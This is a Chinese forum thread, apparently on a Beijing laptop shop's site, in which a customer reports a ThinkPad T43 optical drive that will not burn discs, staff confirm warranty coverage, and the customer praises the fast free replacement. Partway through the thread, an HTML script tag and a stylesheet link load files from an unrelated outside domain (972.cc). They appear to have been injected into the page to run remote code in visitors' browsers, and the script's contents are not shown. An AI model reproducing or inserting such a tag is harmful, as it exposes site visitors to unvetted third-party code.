开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

是不是我的光驱也挂了?-修好了!真快!狂谢不止!

2006年买的“T43 2668-AZ3”。刚买回来不久时,曾经刻过一张盘,是可以正常刻录的。之后,再没有用过刻录,连光驱用的都不多。但是前几天刻录时,总是提示“写入失败”,但读盘是正常的。换了N张盘,试了各种速度,更新了Nero,用了windowsXP自带的刻录功能,还试了Alcohol等全都失败。由于模拟刻录是成功的,因此我怀疑是不是激光头老化,功率不够了?还是有什么其它硬件的原因。

另外,
1、送修是整机,还是光驱就可以了?
2、我是06年4月4日在贵处买的,应该还在保修范围内吧?

盼复!

多谢!

================================================

翔意的服务真是好的没的说。我是干营销的,懂得售后服务对企业生存的价值。翔意一定可以发展壮大!

维修过程:
3.10 发现光驱问题
3.18 回京
3.20 将光驱送到翔意
3.25 得到电话通知,光驱修好了(应该说,是给免费换了一个)

几个关键点:
1、速度:出乎我的意料,只用了不到5天
2、态度:非常好
3、承诺:售后的承诺遵守的非常好
4、费用:0元(我又忍不住加了条内存,那是额外的。不过,与翔意的信誉和服务也是密不可分的)

我的朋友如果买笔记本,我一定会推荐他们来翔意的。翔意翔意,永远满意!

在此,送上我真挚的谢意与祝福!

1:单光驱
2:请列序列号,我们会帮您查询的,在保修期内的话免费保修.(更换光驱)
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

回复 #2 EddieFan 的帖子

您好,谢谢回复。

我的序列号是 
S/N: L3-XNXDC
koskos 该用户已被删除
4月4日的机器,还没过保,赶紧拿过来保修

回复 #5 EddieFan 的帖子

谢谢回复。前几天已经送过去了,一位小姐接待的,态度蛮好的,心里觉得挺踏实。静候佳音了。
呵呵,真不错,赞一个
好服务一定能赢得更大的市场